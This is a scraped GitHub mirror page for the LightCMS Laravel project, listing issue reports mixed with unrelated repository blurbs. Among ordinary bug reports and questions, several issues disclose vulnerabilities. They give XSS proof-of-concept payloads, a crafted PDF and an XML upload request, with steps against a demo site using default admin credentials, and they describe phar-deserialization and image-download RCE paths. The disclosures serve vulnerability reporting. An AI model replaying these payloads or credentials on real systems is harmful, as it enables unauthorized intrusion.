eddy8 / lightcms Goto Github PK
View Code? Open in Web Editor NEWLightCMS 是一个基于 Laravel 开发的轻量级 CMS 系统,也可以作为一个通用的后台管理框架使用。A lightweight cms/admin framework powered by Laravel.
License: Apache License 2.0
LightCMS 是一个基于 Laravel 开发的轻量级 CMS 系统,也可以作为一个通用的后台管理框架使用。A lightweight cms/admin framework powered by Laravel.
License: Apache License 2.0
视图文件
/resources/views/admin/content/add.blade.php line287
@if(isset($model) && $field->is_required == \App\Model\Admin\EntityField::EDIT_DISABLE)
is_required应改为is_edit 此处判断是否可编辑,并非是否必填,请核对
The image:make
function in fetchImageFile can trigger phar deserialization. Combined with the deserialization chain of the laravel framework, it can cause remote code execution vulnerabilities.
lightcms latest version (v1.3.7)
Please see this link for details.
看了下演示很不错,不过听说Laravel不好部署所以还没试用,先支持下。
后台只有图片上传相关程序,视频上传未作处理
There's no escape being done before printing out the value of noun
、verb
、exclusive
in the SensitiveWords page.
Navigate to http://lightcms.bituier.com/admin/login & Log in to the background with the account admin and password admin
Navigate to http://lightcms.bituier.com/admin/SensitiveWords/create & add the below-shared payload as the exclusive
field value.
Payload - </span><img src=1 onerror=alert(1) /><span>
Visit page http://lightcms.bituier.com/admin/SensitiveWords, the payload will be triggered.
大哥数据库呢
企业图片加载速度比较忙,希望把图片上传集成到oss
NEditorController 里面是有存储图片的入口,
是否只需要uploadImage
$result = $file->store(date('Ym'), config('light.neditor.disk')); if (!$result) { return [ 'code' => 3, 'msg' => '上传失败' ]; }
改写入口,还是可以通过扩展包来增加新的呢
提示内容:服务器内部错误,请联系管理员
log:
production.ERROR: No application encryption key has been specified. {"exception":"[object] (RuntimeException(code: 0): No application encryption key has been specified. at D:\Project\cms\vendor\laravel\framework\src\Illuminate\Encryption\EncryptionServiceProvider.php:42)
[stacktrace]
解决方案:
重新生成.env并执行
php artisan key:generate
A stored cross-site scripting (XSS) vulnerability exists in LightCMS that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
%PDF-1.4
%1111
1 0 obj
<<
/CreationDate (D:20210619104632+08'00')
/Creator (xss)
/Producer (PDF-XChange Core API SDK \(7.0.324.2\))
>>
endobj
2 0 obj
<<
/Metadata 3 0 R
/Pages 4 0 R
/Type /Catalog
>>
endobj
3 0 obj
<<
/Length 2983
/Subtype /XML
/Type /Metadata
>>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about=""
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
xmlns:xmp="http://ns.adobe.com/xap/1.0/"
xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
<dc:format>application/pdf</dc:format>
<xmpMM:DocumentID>uuid:9c93bc08-8e4e-46cb-b28f-824c693821a4</xmpMM:DocumentID>
<xmpMM:InstanceID>uuid:2cd63bea-24ca-4ef8-a12c-015da3b28c96</xmpMM:InstanceID>
<xmp:CreateDate>2021-06-19T10:46:32+08:00</xmp:CreateDate>
<xmp:CreatorTool>迅捷PDF编辑器 7.0.324.2</xmp:CreatorTool>
<xmp:ModifyDate>2021-06-19T10:52:02+08:00</xmp:ModifyDate>
<pdf:Producer>PDF-XChange Core API SDK (7.0.324.2)</pdf:Producer>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
搞了一天没弄明白,怎么自己生成左侧菜单
The lightcms content management system uses an outdated ueditor component, therefore there is a domxss vulnerability that allows users to upload an XML file containing a malicious payload which could trigger the vulnerability and lead to an XSS attack.
Log into the admin backend, click on Content Management - Articles - Upload Image
Then upload an image and modify the upload interface, file extension and file header.
Modify the file upload interface to be 'uploadfile'
POST /admin/neditor/serve/uploadfile
-----WebKitFormBoundary4aYhw3HzIslHq0Kq
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/xml
<?xml version="1.0" encoding="GB2312" ?>
<html>
<head>
</head><body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script>
</body>
</html>
------WebKitFormBoundary4aYhw3HzIslHq0Kq--
用户管理,不能给用户选角色
There is no filtering when downloading external images, which can casue arbitrary file reading and remote code execution.
lightcms latest version (v1.3.5)
Place the php file which wants to be executed on your own server, and download it:
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.